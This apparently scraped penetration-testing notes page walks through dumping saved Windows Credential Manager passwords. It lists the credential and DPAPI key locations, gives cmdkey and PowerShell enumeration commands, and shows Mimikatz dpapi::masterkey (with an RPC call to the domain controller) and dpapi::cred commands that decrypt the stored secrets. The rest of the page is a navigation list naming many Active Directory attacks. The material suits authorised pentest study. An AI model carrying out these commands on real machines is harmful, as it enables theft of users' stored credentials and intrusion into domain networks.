Dumping Passwords from Windows Credential Manager

Credential Enumeration

cmdkey /list

In reverse shells, I have noticed that it's impossible to spawn processes using runas.exe /savecred /user:DOMAIN\username if the credential is stored in Windows Credential Manager.

That said, we may still be able to dump the password using the Mimikatz dpapi module, which is how these credentials are protected.

Common Locations for Cached Credentials

# Legacy CMD Environment Variable
"%USERPROFILE%\AppData\Local\Microsoft\Credentials"
"%USERPROFILE%\AppData\Roaming\Microsoft\Credentials"

# PowerShell Environment Variable
"$env:USERPROFILE\AppData\Local\Microsoft\Credentials"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials"

ls -r -h ~\AppData\Local\Microsoft\Credentials\ | select -expand fullname
ls -r -h ~\AppData\Roaming\Microsoft\Credentials\ | select -expand fullname

Enumerate any stored credentials

Common Locations for Encryption Keys

# Legacy CMD Envrionment Variables
"%USERPROFILE%\AppData\Local\Microsoft\Protect"
"%USERPROFILE%\AppData\Roaming\Microsoft\Protect"

# PowerShell Environment Variables
"$env:USERPROFILE\AppData\Local\Microsoft\Protect"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Protect"

ls -r -h ~\AppData\Roaming\Microsoft\Protect\ | select -expand fullname

Enumerate any stored keys

Use Mimikatz to Unprotect DPAPI Data

Cache Master Keys

mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
mimikatz # dpapi::cache

Make RPC call to domain controller to retrieve master key when password is unknown

Unprotect Cached Credentials

mimikatz # dpapi::cred /in:C:\Users\user_name\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

Go through each cached credential file and attempt to unprotect it using the cached encryption keys

References

https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets

https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey

https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials

Enumerating Hosts and Identifying the Domain Controllers

LLMNR Poisoning (Internal)

SMB Relay (Internal/External)

IPv6 DNS Spoofing (Internal)

NULL Session Enumeration (Internal/External)

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting (Internal/External)

Passback Attacks (Internal/External)

PrintNightmare (Internal/External)

NTLM Credential Stuffing (Internal/External)

PowerShell AD Module on Any Domain Host as Any User

Dumping DNS Records with adidnsdump

CrackMapExec

PowerView

BloodHound

Remote Bloodhound

LdapDomainDump

LdapSearch

Enum4Linux

GetADUsers.py

GetUserSPNs.py

Manual Enumeration

Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs

Mimikatz

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

Impacket-Addcomputer

DCSync

Pass the Password

Pass the Hash

Pass the Ticket

Pass the Key

Password & Credential Brute Force

Token Impersonation

Spawn Processes as Other Users

Kerberoasting

Group Policy Preferences (GPP)

PrintNightmare

ZeroLogon

xfreerdp

Dumping Passwords from Windows Credential Manager

Credential Enumeration

Common Locations for Cached Credentials

Common Locations for Encryption Keys

Use Mimikatz to Unprotect DPAPI Data

Cache Master Keys

Unprotect Cached Credentials

References